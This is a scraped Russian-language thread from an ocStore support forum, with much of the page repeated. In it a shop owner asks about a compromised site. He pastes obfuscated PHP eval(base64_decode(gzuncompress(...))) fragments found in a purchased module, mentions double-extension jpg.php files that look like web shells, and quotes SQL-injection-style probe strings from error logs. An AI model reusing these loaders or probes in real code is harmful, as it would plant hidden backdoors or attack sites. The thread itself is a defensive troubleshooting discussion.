pashast Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 Хостер случайно не таймвеб? За последнюю неделю уже 2й случай заражанея на этом хостинге Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 20 травня 2015 Автор Share Опубліковано: 20 травня 2015 agropuls, да с первого раза все норм. pashast, нет, другой хостер Надіслати Поділитися на інших сайтах More sharing options... 1 month later... Stels32 Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 А у меня тож интересный вопросПоявились логи говорящие о хак атакахначал копатьсявот че нарылпричем находится все это в файлах официально купленного модуля на данном форумеПодскажите, пожалуйста, это нормально или с эти надо бороться?Автору модуля, пока не писал, хочу услышать общественность. T3FUO+Z+bm1WKASqbgNkIEWV8tntBQA7Jpj0qb89LYEIS6IArjZNdqkR+v33dfv78A9B4IPA=";eval( base64_decode(gzuncompress(base64_decode($Q54ACFE96BAA0BF949075E2A19100128E)))) /7Rcu3STX7vWXG49zIiJIVoNJIX2ClMfW4yZDYkORsKkWNlmPgPgckRXNSa7nbP3xz0/ykx+i";eval( base64_decode(gzuncompress(base64_decode($Q76CB6D5EB07652499F17736759C56EDF)))) zNT+Gs8OOsH/u+3ckMmZQ/n6PywTOtxyd2QH2TIIM5VBDGh0LMx/Z/T/fP//zP/8Liph1Qg==";eval( base64_decode(gzuncompress(base64_decode($Q634D7AE1BF41FA3EC9676FC83EE3753D)))) Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 (змінено) Вычистил папку download от непонятного барахлатерь вкумод ругается 2015-06-26 17:41:34 - PHP Warning: fopen(/home/i/infostoj/stels32.ru/public_html/download/test): failed to open stream: Permission denied in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 111 2015-06-26 17:41:34 - PHP Warning: fwrite() expects parameter 1 to be resource, boolean given in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 113 2015-06-26 17:41:34 - PHP Warning: fclose() expects parameter 1 to be resource, boolean given in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 115 2015-06-26 17:41:34 - PHP Warning: sprintf(): Too few arguments in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 118 не находит файлик test а AI BOLIT на него ругался при проверке Змінено 26 червня 2015 користувачем Stels32 Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 что за модуль-то? если simplecheckout - возможно, это упакованные базовые настройки. ругается не vqmod, а движок. проверяя наличие корректных прав на директории. и не находя. что там "AI BOLIT" хотел - нам не известно. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 модуль разметки Microdata а в папке download вообще должны быть какие-то файлы??? потому что там лежали очень подозрительные двойного расширения jpg.php. и именами типа aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 1264 и тд и тп и в корневом каталоге был файл mysql.php с частично закрытым кодом Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 27 червня 2015 Share Опубліковано: 27 червня 2015 Нет, каталог download должен быть пуст. Если есть лишние файлы, то магазин был взломан и заражен. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 4 липня 2015 Share Опубліковано: 4 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Микроразметка + ОСТРОВА в YANDEX2.1 автор заверил что все нормально Здравствуйте. Да, могут ругаться. Они часто ругаются на обфурсцированные(закодированные) скрипты. Так что это нормально. Ради собственного спокойствия можете скачать на форуме модуль и заменить необходимые файлы. Вирусов там точно никаких нет. Могу также ключ продублировать. а вирусдай ругается Обнаружены заражения следующих типов: h.ExternalRedirect. завтра планировал оплатить год обслуживания у них Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 автор заверил что все нормально ясн. так и есть. ...а вирусдай ругается... что-что?.. мысли собери - по ссылке речь о .htaccess Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 6 липня 2015 Share Опубліковано: 6 липня 2015 ясн. так и есть. что-что?.. мысли собери - по ссылке речь о .htaccess перепроверил все имеющиеся .htaccess никаких редиректов нет Надіслати Поділитися на інших сайтах More sharing options... laim731 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32 Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Если не поможет - обращайтесь. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 ...терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download...не "не находит", а "не может создать". ocStore проверяет права на директории. если цифровых товаров не предвидится - можно вообще убить эту директорию и выкусить из ocStore её проверку на корректные права. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 9 липня 2015 Share Опубліковано: 9 липня 2015 Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая 2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49 закидывал в гугл запрос типа \ Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ' ничего не выдает до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе только в ней было конкретно указано на характерную для хака кодировку 2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQLsyntax; check the manual that corresponds to your MySQL server versionfor the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'' at line 1Error No:1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in теперь совсем в растерянности Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 11 липня 2015 Share Опубліковано: 11 липня 2015 кто подскажет (взято из access.log) что это означает редирект или идет ссылка на данные ресурсы?Заранее спасибо! /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net//detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/""GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/""GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/" Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 13 липня 2015 Share Опубліковано: 13 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 2 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
hitball Опубліковано: 20 травня 2015 Автор Share Опубліковано: 20 травня 2015 agropuls, да с первого раза все норм. pashast, нет, другой хостер Надіслати Поділитися на інших сайтах More sharing options...
Stels32 Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 А у меня тож интересный вопросПоявились логи говорящие о хак атакахначал копатьсявот че нарылпричем находится все это в файлах официально купленного модуля на данном форумеПодскажите, пожалуйста, это нормально или с эти надо бороться?Автору модуля, пока не писал, хочу услышать общественность. T3FUO+Z+bm1WKASqbgNkIEWV8tntBQA7Jpj0qb89LYEIS6IArjZNdqkR+v33dfv78A9B4IPA=";eval( base64_decode(gzuncompress(base64_decode($Q54ACFE96BAA0BF949075E2A19100128E)))) /7Rcu3STX7vWXG49zIiJIVoNJIX2ClMfW4yZDYkORsKkWNlmPgPgckRXNSa7nbP3xz0/ykx+i";eval( base64_decode(gzuncompress(base64_decode($Q76CB6D5EB07652499F17736759C56EDF)))) zNT+Gs8OOsH/u+3ckMmZQ/n6PywTOtxyd2QH2TIIM5VBDGh0LMx/Z/T/fP//zP/8Liph1Qg==";eval( base64_decode(gzuncompress(base64_decode($Q634D7AE1BF41FA3EC9676FC83EE3753D)))) Надіслати Поділитися на інших сайтах More sharing options...
Stels32 Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 (змінено) Вычистил папку download от непонятного барахлатерь вкумод ругается 2015-06-26 17:41:34 - PHP Warning: fopen(/home/i/infostoj/stels32.ru/public_html/download/test): failed to open stream: Permission denied in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 111 2015-06-26 17:41:34 - PHP Warning: fwrite() expects parameter 1 to be resource, boolean given in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 113 2015-06-26 17:41:34 - PHP Warning: fclose() expects parameter 1 to be resource, boolean given in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 115 2015-06-26 17:41:34 - PHP Warning: sprintf(): Too few arguments in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 118 не находит файлик test а AI BOLIT на него ругался при проверке Змінено 26 червня 2015 користувачем Stels32 Надіслати Поділитися на інших сайтах More sharing options...
afwollis Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 что за модуль-то? если simplecheckout - возможно, это упакованные базовые настройки. ругается не vqmod, а движок. проверяя наличие корректных прав на директории. и не находя. что там "AI BOLIT" хотел - нам не известно. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 модуль разметки Microdata а в папке download вообще должны быть какие-то файлы??? потому что там лежали очень подозрительные двойного расширения jpg.php. и именами типа aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 1264 и тд и тп и в корневом каталоге был файл mysql.php с частично закрытым кодом Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 27 червня 2015 Share Опубліковано: 27 червня 2015 Нет, каталог download должен быть пуст. Если есть лишние файлы, то магазин был взломан и заражен. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 4 липня 2015 Share Опубліковано: 4 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Микроразметка + ОСТРОВА в YANDEX2.1 автор заверил что все нормально Здравствуйте. Да, могут ругаться. Они часто ругаются на обфурсцированные(закодированные) скрипты. Так что это нормально. Ради собственного спокойствия можете скачать на форуме модуль и заменить необходимые файлы. Вирусов там точно никаких нет. Могу также ключ продублировать. а вирусдай ругается Обнаружены заражения следующих типов: h.ExternalRedirect. завтра планировал оплатить год обслуживания у них Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 автор заверил что все нормально ясн. так и есть. ...а вирусдай ругается... что-что?.. мысли собери - по ссылке речь о .htaccess Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 6 липня 2015 Share Опубліковано: 6 липня 2015 ясн. так и есть. что-что?.. мысли собери - по ссылке речь о .htaccess перепроверил все имеющиеся .htaccess никаких редиректов нет Надіслати Поділитися на інших сайтах More sharing options... laim731 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32 Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Если не поможет - обращайтесь. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 ...терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download...не "не находит", а "не может создать". ocStore проверяет права на директории. если цифровых товаров не предвидится - можно вообще убить эту директорию и выкусить из ocStore её проверку на корректные права. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 9 липня 2015 Share Опубліковано: 9 липня 2015 Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая 2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49 закидывал в гугл запрос типа \ Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ' ничего не выдает до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе только в ней было конкретно указано на характерную для хака кодировку 2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQLsyntax; check the manual that corresponds to your MySQL server versionfor the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'' at line 1Error No:1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in теперь совсем в растерянности Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 11 липня 2015 Share Опубліковано: 11 липня 2015 кто подскажет (взято из access.log) что это означает редирект или идет ссылка на данные ресурсы?Заранее спасибо! /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net//detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/""GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/""GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/" Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 13 липня 2015 Share Опубліковано: 13 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 2 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
Stels32 Опубліковано: 26 червня 2015 Share Опубліковано: 26 червня 2015 модуль разметки Microdata а в папке download вообще должны быть какие-то файлы??? потому что там лежали очень подозрительные двойного расширения jpg.php. и именами типа aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 1264 и тд и тп и в корневом каталоге был файл mysql.php с частично закрытым кодом Надіслати Поділитися на інших сайтах More sharing options...
halfhope Опубліковано: 27 червня 2015 Share Опубліковано: 27 червня 2015 Нет, каталог download должен быть пуст. Если есть лишние файлы, то магазин был взломан и заражен. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 4 липня 2015 Share Опубліковано: 4 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Микроразметка + ОСТРОВА в YANDEX2.1 автор заверил что все нормально Здравствуйте. Да, могут ругаться. Они часто ругаются на обфурсцированные(закодированные) скрипты. Так что это нормально. Ради собственного спокойствия можете скачать на форуме модуль и заменить необходимые файлы. Вирусов там точно никаких нет. Могу также ключ продублировать. а вирусдай ругается Обнаружены заражения следующих типов: h.ExternalRedirect. завтра планировал оплатить год обслуживания у них Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 автор заверил что все нормально ясн. так и есть. ...а вирусдай ругается... что-что?.. мысли собери - по ссылке речь о .htaccess Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 6 липня 2015 Share Опубліковано: 6 липня 2015 ясн. так и есть. что-что?.. мысли собери - по ссылке речь о .htaccess перепроверил все имеющиеся .htaccess никаких редиректов нет Надіслати Поділитися на інших сайтах More sharing options... laim731 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32 Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Если не поможет - обращайтесь. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 ...терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download...не "не находит", а "не может создать". ocStore проверяет права на директории. если цифровых товаров не предвидится - можно вообще убить эту директорию и выкусить из ocStore её проверку на корректные права. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 9 липня 2015 Share Опубліковано: 9 липня 2015 Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая 2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php 